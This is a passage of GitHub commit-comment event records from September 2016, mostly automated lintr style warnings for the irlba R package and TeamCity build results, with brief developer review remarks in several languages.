^\n```\n[tests/edge.R:62:34:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                                 ^\n```\n[tests/edge.R:62:36:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                                   ^\n```"}},"created_at":"2016-09-21T13:48:29Z"}
{"id":"4596352254","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":19113942,"position":null,"line":null,"path":null,"commit_id":"f57af3253d667002ba50f1dddf5f79b6c775177e","created_at":"2016-09-21T13:48:35Z","updated_at":"2016-09-21T13:48:35Z","body":"TeamCity libpalaso :: palaso-win32-master Continuous [Build 3.0.775.f57af3253d667002ba50f1dddf5f79b6c775177e](http://build.palaso.org/viewLog.html?buildId=77001&buildTypeId=bt223) outcome was **SUCCESS**\nSummary: Tests passed: 3490, ignored: 126 Build time: 00:05:45"}},"created_at":"2016-09-21T13:48:35Z"}
{"id":"4596352583","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"bwlewis/irlba"},"payload":{"comment":{"id":19113943,"position":null,"line":null,"path":null,"commit_id":"ade71145c6078bac0ee00de05b584afca0c7a385","created_at":"2016-09-21T13:48:39Z","updated_at":"2016-09-21T13:48:39Z","body":"[R/irlba.R:300:1:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/R/irlba.R#L300) *style:* **lines should not be more than 130 characters.**\n```r\n​      if (verbose) message(\"Initializing starting vector v with samples from standard normal distribution.\\nUse `set.seed` first for reproducibility.\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/irlba.R:342:9:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/R/irlba.R#L342) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​      if(tol * ans$d[1] < eps) warning(\"convergence criterion below machine epsilon\")\n        ^\n```\n[R/irlba.R:635:5:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/R/irlba.R#L635) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(tol * d[1] < eps) warning(\"convergence criterion below machine epsilon\")\n    ^\n```\n[tests/edge.R:30:19:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L30) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​for (tol in 10 ^ -(7:12))\n                  ^\n```\n[tests/edge.R:60:22:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                     ^\n```\n[tests/edge.R:60:24:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                       ^\n```\n[tests/edge.R:60:26:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                         ^\n```\n[tests/edge.R:60:28:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                           ^\n```\n[tests/edge.R:60:30:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                             ^\n```\n[tests/edge.R:60:32:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                               ^\n```\n[tests/edge.R:60:34:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                                 ^\n```\n[tests/edge.R:60:36:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                                   ^\n```\n[tests/edge.R:62:22:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                     ^\n```\n[tests/edge.R:62:24:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                       ^\n```\n[tests/edge.R:62:26:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                         ^\n```\n[tests/edge.R:62:28:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                           ^\n```\n[tests/edge.R:62:30:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                             ^\n```\n[tests/edge.R:62:32:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                               ^\n```\n[tests/edge.R:62:34:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                                 ^\n```\n[tests/edge.R:62:36:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                                   ^\n```"}},"created_at":"2016-09-21T13:48:39Z"}
{"id":"4596352762","type":"CommitCommentEvent","actor":{"login":"ptomin"},"repo":{"name":"uxmal/reko"},"payload":{"comment":{"id":19113944,"position":517,"line":517,"path":"subjects/PE-x86/pySample/pySample.c","commit_id":"e792a89b67ccb3cf04c10e47d3804cf32688fd00","created_at":"2016-09-21T13:48:41Z","updated_at":"2016-09-21T13:48:41Z","body":"... and this is regression too\r\n"}},"created_at":"2016-09-21T13:48:41Z"}
{"id":"4596353334","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"bwlewis/irlba"},"payload":{"comment":{"id":19113947,"position":null,"line":null,"path":null,"commit_id":"ade71145c6078bac0ee00de05b584afca0c7a385","created_at":"2016-09-21T13:48:47Z","updated_at":"2016-09-21T13:48:47Z","body":"[R/irlba.R:300:1:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/R/irlba.R#L300) *style:* **lines should not be more than 130 characters.**\n```r\n​      if (verbose) message(\"Initializing starting vector v with samples from standard normal distribution.\\nUse `set.seed` first for reproducibility.\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/irlba.R:342:9:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/R/irlba.R#L342) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​      if(tol * ans$d[1] < eps) warning(\"convergence criterion below machine epsilon\")\n        ^\n```\n[R/irlba.R:635:5:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/R/irlba.R#L635) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(tol * d[1] < eps) warning(\"convergence criterion below machine epsilon\")\n    ^\n```\n[tests/edge.R:30:19:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L30) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​for (tol in 10 ^ -(7:12))\n                  ^\n```\n[tests/edge.R:60:22:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                     ^\n```\n[tests/edge.R:60:24:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                       ^\n```\n[tests/edge.R:60:26:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                         ^\n```\n[tests/edge.R:60:28:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                           ^\n```\n[tests/edge.R:60:30:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                             ^\n```\n[tests/edge.R:60:32:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                               ^\n```\n[tests/edge.R:60:34:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                                 ^\n```\n[tests/edge.R:60:36:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                                   ^\n```\n[tests/edge.R:62:22:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                     ^\n```\n[tests/edge.R:62:24:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                       ^\n```\n[tests/edge.R:62:26:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                         ^\n```\n[tests/edge.R:62:28:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                           ^\n```\n[tests/edge.R:62:30:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                             ^\n```\n[tests/edge.R:62:32:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                               ^\n```\n[tests/edge.R:62:34:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                                 ^\n```\n[tests/edge.R:62:36:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                                   ^\n```"}},"created_at":"2016-09-21T13:48:47Z"}
{"id":"4596353630","type":"CommitCommentEvent","actor":{"login":"Iamkiddingyou"},"repo":{"name":"Iamkiddingyou/-"},"payload":{"comment":{"id":19113949,"position":2,"line":2,"path":"README.md","commit_id":"a00f3623954d77c2657cceaa4fa0a370ee5e6fea","created_at":"2016-09-21T13:48:50Z","updated_at":"2016-09-21T13:48:50Z","body":"<!DOCTYPE html>\r\n\r\n<html>\r\n<head>\r\n<title>九宫格布局</title>\r\n<meta name=\"viewport\" content=\"width=device-width initial-scale=1\" />\r\n<style type=\"text/css\">\r\nhtml,body{ height: 100%; margin: 0; }\r\n    #block{height:100%;\r\n          width:50%;\r\n          margin-left:25%;\r\n          margin-top:10%;\r\n          }\r\n    #block1{height:25%;\r\n          width:25%;\r\n          border-radius:10%;\r\n          margin:1%;\r\n          float:left;\r\n          background-color:orange     \r\n          }\r\n</style>\r\n</head>\r\n\r\n<body>\r\n<div id=\"block\">\r\n<div id=\"block1\"></div>\r\n<div id=\"block1\"></div>\r\n<div id=\"block1\"></div>\r\n<div id=\"block1\"></div>\r\n<div id=\"block1\"></div>\r\n<div id=\"block1\"></div>\r\n<div id=\"block1\"></div>\r\n<div id=\"block1\"></div>\r\n<div id=\"block1\"></div>\r\n</div>\r\n\r\n</body>\r\n</html>"}},"created_at":"2016-09-21T13:48:50Z"}
{"id":"4596357802","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":19113957,"position":null,"line":null,"path":null,"commit_id":"f57af3253d667002ba50f1dddf5f79b6c775177e","created_at":"2016-09-21T13:49:32Z","updated_at":"2016-09-21T13:49:32Z","body":"TeamCity libpalaso :: palaso-precise64-libpalaso-2.6 Continuous [Build 2.6.1100.f57af3253d667002ba50f1dddf5f79b6c775177e](http://build.palaso.org/viewLog.html?buildId=76999&buildTypeId=PalasoPrecise64v26Cont) outcome was **SUCCESS**\nSummary: Tests passed: 3470, ignored: 107 Build time: 00:06:43"}},"created_at":"2016-09-21T13:49:32Z"}
{"id":"4596358445","type":"CommitCommentEvent","actor":{"login":"alacambra"},"repo":{"name":"hwuerz/jpa-example"},"payload":{"comment":{"id":19113962,"position":30,"line":34,"path":"src/main/java/de/hwuerz/example/hibernate/Controller.java","commit_id":"73268dd9f09c9719889a3568a96b6e98f1bf077d","created_at":"2016-09-21T13:49:38Z","updated_at":"2016-09-21T13:49:38Z","body":"<persistence-unit name=\"MyPU\" transaction-type=\"JTA\"> dann die tx wird dusrch den container gesteuert. Solltest du keine manuel starten"}},"created_at":"2016-09-21T13:49:38Z"}
{"id":"4596360745","type":"CommitCommentEvent","actor":{"login":"lanrion"},"repo":{"name":"ruby-china/ruby-china"},"payload":{"comment":{"id":19113969,"position":null,"line":null,"path":null,"commit_id":"e53bd839653a7181ab53539603ad45869f195bb8","created_at":"2016-09-21T13:50:01Z","updated_at":"2016-09-21T13:50:01Z","body":"我也不行。。。"}},"created_at":"2016-09-21T13:50:01Z"}
{"id":"4596363400","type":"CommitCommentEvent","actor":{"login":"vantu5z"},"repo":{"name":"vantu5z/RHVoice-dictionary"},"payload":{"comment":{"id":19113983,"position":5,"line":1007,"path":"tools/templates.py","commit_id":"472dbcf9a62bafe169a3a0fd5ea0c81fa28a1ba2","created_at":"2016-09-21T13:50:27Z","updated_at":"2016-09-21T13:50:27Z","body":"косяк в табуляции\r\nисправил в коммите f14966b308930fdcbc3bb8fa05fc07d5b09915d7"}},"created_at":"2016-09-21T13:50:27Z"}
{"id":"4596363723","type":"CommitCommentEvent","actor":{"login":"ptomin"},"repo":{"name":"uxmal/reko"},"payload":{"comment":{"id":19113985,"position":null,"line":null,"path":null,"commit_id":"58d8c8c8a3c93e32427ed833c6b38934b6fcf1f1","created_at":"2016-09-21T13:50:30Z","updated_at":"2016-09-21T13:50:30Z","body":"And what about PySample (see https://github.com/uxmal/reko/commit/e792a89b67ccb3cf04c10e47d3804cf32688fd00#commitcomment-19113944)?"}},"created_at":"2016-09-21T13:50:30Z"}
{"id":"4596364417","type":"CommitCommentEvent","actor":{"login":"pierreozoux"},"repo":{"name":"mapkyca/KnownLinkedin"},"payload":{"comment":{"id":19113989,"position":null,"line":null,"path":null,"commit_id":"5a6a3d07db42f6bb1a339ba3fe555a296c7901b6","created_at":"2016-09-21T13:50:38Z","updated_at":"2016-09-21T13:50:38Z","body":"If convoy is using it, they have to ship the code also, right?"}},"created_at":"2016-09-21T13:50:38Z"}
{"id":"4596367676","type":"CommitCommentEvent","actor":{"login":"bpeacock2002"},"repo":{"name":"bpeacock2002/PeacockFamily"},"payload":{"comment":{"id":19113995,"position":2,"line":2,"path":"README.md","commit_id":"f0dc02ea557c6735f8157580c591c420d44fb337","created_at":"2016-09-21T13:51:10Z","updated_at":"2016-09-21T13:51:10Z","body":"This is a change"}},"created_at":"2016-09-21T13:51:10Z"}
{"id":"4596369719","type":"CommitCommentEvent","actor":{"login":"mapkyca"},"repo":{"name":"mapkyca/KnownLinkedin"},"payload":{"comment":{"id":19114005,"position":null,"line":null,"path":null,"commit_id":"5a6a3d07db42f6bb1a339ba3fe555a296c7901b6","created_at":"2016-09-21T13:51:29Z","updated_at":"2016-09-21T13:51:29Z","body":"Nope, GPL doesn't affect web services."}},"created_at":"2016-09-21T13:51:29Z"}
{"id":"4596373426","type":"CommitCommentEvent","actor":{"login":"bpeacock2002"},"repo":{"name":"bpeacock2002/PeacockFamily"},"payload":{"comment":{"id":19114012,"position":null,"line":null,"path":null,"commit_id":"f0dc02ea557c6735f8157580c591c420d44fb337","created_at":"2016-09-21T13:52:03Z","updated_at":"2016-09-21T13:52:03Z","body":"Another comment"}},"created_at":"2016-09-21T13:52:03Z"}
{"id":"4596374655","type":"CommitCommentEvent","actor":{"login":"JKatzwinkel"},"repo":{"name":"jsettlers/settlers-remake"},"payload":{"comment":{"id":19114013,"position":null,"line":null,"path":null,"commit_id":"d02c6ba05e4bebab92dba020f8f2f2070b098d65","created_at":"2016-09-21T13:52:16Z","updated_at":"2016-09-21T13:52:16Z","body":"Nice. While you're at it, would you consider renaming value `BLADE` to `SHOVEL`? Its really confusing."}},"created_at":"2016-09-21T13:52:16Z"}
{"id":"4596374863","type":"CommitCommentEvent","actor":{"login":"ArikYa"},"repo":{"name":"pristineio/webrtc-build-scripts"},"payload":{"comment":{"id":19114014,"position":null,"line":null,"path":null,"commit_id":"6a2c85f9692736ba92e5859d614655bcabdba060","created_at":"2016-09-21T13:52:18Z","updated_at":"2016-09-21T13:52:18Z","body":"This means you can only use the scripts to build older revisions that still run GYP as part of the \"gclient sync\" command."}},"created_at":"2016-09-21T13:52:18Z"}
{"id":"4596376634","type":"CommitCommentEvent","actor":{"login":"andreasabel"},"repo":{"name":"agda/agda"},"payload":{"comment":{"id":19114023,"position":null,"line":null,"path":null,"commit_id":"59575d539b836d01acb63af3650149e41dcd4e6a","created_at":"2016-09-21T13:52:35Z","updated_at":"2016-09-21T13:52:35Z","body":"Thanks.  It would make sense to add the documentation also to http://agda.readthedocs.io/en/latest/language/module-system.html"}},"created_at":"2016-09-21T13:52:35Z"}
{"id":"4596378688","type":"CommitCommentEvent","actor":{"login":"alacambra"},"repo":{"name":"hwuerz/jpa-example"},"payload":{"comment":{"id":19114026,"position":14,"line":14,"path":"src/main/java/de/hwuerz/example/hibernate/Controller.java","commit_id":"adbbef29151fa4399feebf491949cc70bbe245e8","created_at":"2016-09-21T13:52:56Z","updated_at":"2016-09-21T13:52:56Z","body":"Wenn du @Statetful und @Named (hier nicht ganz sicher) verwendet wird die TX gestartet. Keine local Tx benötigt. @Transactional wurde auch den TX startentarten. Viele Grüße!!!"}},"created_at":"2016-09-21T13:52:56Z"}
{"id":"4596380803","type":"CommitCommentEvent","actor":{"login":"ruz76"},"repo":{"name":"ruz76/maventest"},"payload":{"comment":{"id":19114031,"position":null,"line":null,"path":null,"commit_id":"b4be965afa5f0667d9b930969be3dce4ac7062a8","created_at":"2016-09-21T13:53:17Z","updated_at":"2016-09-21T13:53:17Z","body":"ddd"}},"created_at":"2016-09-21T13:53:17Z"}
{"id":"4596382249","type":"CommitCommentEvent","actor":{"login":"dillbyrne"},"repo":{"name":"dillbyrne/random-agent-spoofer"},"payload":{"comment":{"id":19114032,"position":null,"line":null,"path":null,"commit_id":"9caaf7267cc40ce506d7634f3ee4c3994d7a3051","created_at":"2016-09-21T13:53:31Z","updated_at":"2016-09-21T13:53:31Z","body":"This is also to differentiate them from other iPad profiles as the screen sizes will be different"}},"created_at":"2016-09-21T13:53:31Z"}
{"id":"4596386471","type":"CommitCommentEvent","actor":{"login":"antoniotuzzi"},"repo":{"name":"pristineio/webrtc-build-scripts"},"payload":{"comment":{"id":19114046,"position":null,"line":null,"path":null,"commit_id":"6a2c85f9692736ba92e5859d614655bcabdba060","created_at":"2016-09-21T13:54:13Z","updated_at":"2016-09-21T13:54:13Z","body":"and what's the LAST GYP revision ? (hoping that the depot_tools will work)"}},"created_at":"2016-09-21T13:54:13Z"}
{"id":"4596387268","type":"CommitCommentEvent","actor":{"login":"chimney37"},"repo":{"name":"chimney37/TileEngine"},"payload":{"comment":{"id":19114049,"position":null,"line":null,"path":null,"commit_id":"663917ff50fd5b2a11c9c13b050b363ff5e420ca","created_at":"2016-09-21T13:54:22Z","updated_at":"2016-09-21T13:54:22Z","body":"Forgot to update : it fixes also when you click outside of screen, the Cell Coordinate causes an index out of range exception."}},"created_at":"2016-09-21T13:54:22Z"}
{"id":"4596389462","type":"CommitCommentEvent","actor":{"login":"NicolasLacombe"},"repo":{"name":"julianstorer/JUCE"},"payload":{"comment":{"id":19114054,"position":5,"line":43,"path":"modules/juce_graphics/effects/juce_GlowEffect.cpp","commit_id":"ceb556876a87e84d703096e47e6d35b82a21cb61","created_at":"2016-09-21T13:54:43Z","updated_at":"2016-09-21T13:54:43Z","body":"Hi!\r\n\r\nCould we have the input image as a const reference here?\r\n\r\nThe source image is not modified in the function implementation anyway.\r\n\r\nThanks!\r\n\r\nNicolas"}},"created_at":"2016-09-21T13:54:43Z"}
{"id":"4596389918","type":"CommitCommentEvent","actor":{"login":"jasonwynn10"},"repo":{"name":"jasonwynn10/MyPlot"},"payload":{"comment":{"id":19114055,"position":null,"line":null,"path":null,"commit_id":"116c752bf3370b55d52ac36ee4e5eedc3841430a","created_at":"2016-09-21T13:54:47Z","updated_at":"2016-09-21T13:54:47Z","body":"fixed help command for #4"}},"created_at":"2016-09-21T13:54:47Z"}
{"id":"4596390250","type":"CommitCommentEvent","actor":{"login":"wangshan"},"repo":{"name":"wangshan/footnote_test"},"payload":{"comment":{"id":19114056,"position":5,"line":44,"path":"comparefp.h","commit_id":"8cfd29a37032242bb9a14c2fa316084d106bc2ba","created_at":"2016-09-21T13:54:50Z","updated_at":"2016-09-21T13:54:50Z","body":"xxx"}},"created_at":"2016-09-21T13:54:50Z"}
{"id":"4596390874","type":"CommitCommentEvent","actor":{"login":"meyerdan"},"repo":{"name":"camunda/camunda-bpm-platform"},"payload":{"comment":{"id":19114059,"position":null,"line":null,"path":null,"commit_id":"cc3f67261a1f5681ae4d612693801e62c1a9dc1d","created_at":"2016-09-21T13:54:56Z","updated_at":"2016-09-21T13:54:56Z","body":":camel: "}},"created_at":"2016-09-21T13:54:56Z"}
{"id":"4596392081","type":"CommitCommentEvent","actor":{"login":"Jhno591"},"repo":{"name":"Jhno591/Citra"},"payload":{"comment":{"id":19114060,"position":null,"line":null,"path":null,"commit_id":"a671a254559bff4aa71e9e38dd31134c5a62d778","created_at":"2016-09-21T13:55:08Z","updated_at":"2016-09-21T13:55:08Z","body":"You can find me here I'm drwhojan , could you take a look at this text list ?, thank you, download it on the page - https://gbatemp.net/threads/citra-unofficial-chinese-builds-discussion.431974/page-67#post-6696876"}},"created_at":"2016-09-21T13:55:08Z"}
{"id":"4596392888","type":"CommitCommentEvent","actor":{"login":"blakejohnson"},"repo":{"name":"BBN-Q/QGL"},"payload":{"comment":{"id":19114062,"position":null,"line":null,"path":null,"commit_id":"a2be5718e954050e36d4be3d782d99b7319c6a57","created_at":"2016-09-21T13:55:15Z","updated_at":"2016-09-21T13:55:15Z","body":"@matthewware Were you actually responsible for this `Swap` function? I cannot figure out what it is trying to do."}},"created_at":"2016-09-21T13:55:15Z"}
{"id":"4596393835","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":19114065,"position":null,"line":null,"path":null,"commit_id":"f57af3253d667002ba50f1dddf5f79b6c775177e","created_at":"2016-09-21T13:55:24Z","updated_at":"2016-09-21T13:55:24Z","body":"TeamCity libpalaso :: palaso-precise64-master Continuous [Build 3.0.769.f57af3253d667002ba50f1dddf5f79b6c775177e](http://build.palaso.org/viewLog.html?buildId=77002&buildTypeId=bt322) outcome was **SUCCESS**\nSummary: Tests passed: 3470, ignored: 107 Build time: 00:05:48"}},"created_at":"2016-09-21T13:55:24Z"}
{"id":"4596395545","type":"CommitCommentEvent","actor":{"login":"miloyip"},"repo":{"name":"miloyip/rapidjson"},"payload":{"comment":{"id":19114069,"position":20,"line":213,"path":"test/unittest/prettywritertest.cpp","commit_id":"185a7cc21026550cda61d01cca6004b63a26963b","created_at":"2016-09-21T13:55:39Z","updated_at":"2016-09-21T13:55:39Z","body":"Fixed in 0761ac126b1aa2144a26c26dfde1c08073eda43a\r\nThank you."}},"created_at":"2016-09-21T13:55:39Z"}
{"id":"4596400436","type":"CommitCommentEvent","actor":{"login":"bcismariu"},"repo":{"name":"hantescu/ColorGame"},"payload":{"comment":{"id":19114083,"position":null,"line":null,"path":null,"commit_id":"eb85c6fa789666222807c6df9f5a8af32297f837","created_at":"2016-09-21T13:56:24Z","updated_at":"2016-09-21T13:56:24Z","body":"a disparut `colors.js` si a aparut `stript.js` care implementeaza functionalitati necerute in specificatii :)\r\n\r\neu sustin cu tarie inovatia si cautarea de alternative, dar mi se pare ca intri intr-o zona exploratorie, fara sa fi rezolvat macar functionalitatea de baza a proiectului..."}},"created_at":"2016-09-21T13:56:24Z"}
{"id":"4596402032","type":"CommitCommentEvent","actor":{"login":"yong-at-git"},"repo":{"name":"jinyanliu/HarryPotterQuiz"},"payload":{"comment":{"id":19114087,"position":null,"line":null,"path":null,"commit_id":"c034fea5ed96237be61a8d06eb0682f985c0c542","created_at":"2016-09-21T13:56:41Z","updated_at":"2016-09-21T13:56:41Z","body":"Thumbs up for the details!"}},"created_at":"2016-09-21T13:56:41Z"}
{"id":"4596403373","type":"CommitCommentEvent","actor":{"login":"Lightn1ng"},"repo":{"name":"Lightn1ng/arch_install_script"},"payload":{"comment":{"id":19114090,"position":null,"line":null,"path":null,"commit_id":"2342d44d0cb7ef383f674d5386a2c01991d07223","created_at":"2016-09-21T13:56:53Z","updated_at":"2016-09-21T13:56:53Z","body":"Don't you think GPU1 should be set as Intel GPU and GPU2 should be set as discreet GPU on gaming laptops..?"}},"created_at":"2016-09-21T13:56:53Z"}
